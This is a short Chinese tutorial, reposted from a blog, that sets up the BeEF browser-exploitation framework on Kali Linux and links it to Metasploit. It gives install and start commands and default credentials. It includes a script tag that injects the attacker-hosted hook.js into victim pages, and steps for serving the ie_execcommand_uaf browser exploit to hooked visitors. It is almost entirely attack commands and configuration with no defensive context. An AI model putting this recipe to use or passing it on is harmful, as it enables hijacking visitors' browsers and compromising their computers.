Kali linux 系统默认未安装beef,需要自行安装
1
2
|
apt-get update
apt-get
install
beef-xss
|
启动/usr/share/beef-xss
1
2
|
cd
/usr/share/beef-xss
.
/beef
|
账号密码
127.0.0.1:3000/ui/pannel
beef/beef
嵌入代码
<script src="Ip:3000/hook.js">
与Metasploit联动
Beef配置文件
/usr/share/beef-xss/config.yaml
1
2
|
metasploit:
enable
:
false
|
改成
1
2
|
metasploit:
enable
:
true
|
vim
/usr/share/beef-xss/extensions/metasploit/config
.yaml
原:
1
|
{os:
'custom'
, path:
''
}
|
修改成
1
|
{os:
'custom'
, path:
'/usr/share/metasploit-framework/'
}
|
修改 host callback_host两参数,改为beef主机IP
重启postgresq、metasploit、服务
1
|
service postgresql restart & service metasploit restart
|
msfconsole
#启动Metasploit
|
1
|
load msgrpc ServerHost=IP Pass=abc123
|
MSF设置:
use exploit
/windows/browser/ie_execcommand_uaf
show options
set
srvhost IP
exploit
/run
转载于:https://blog.51cto.com/biock/1621563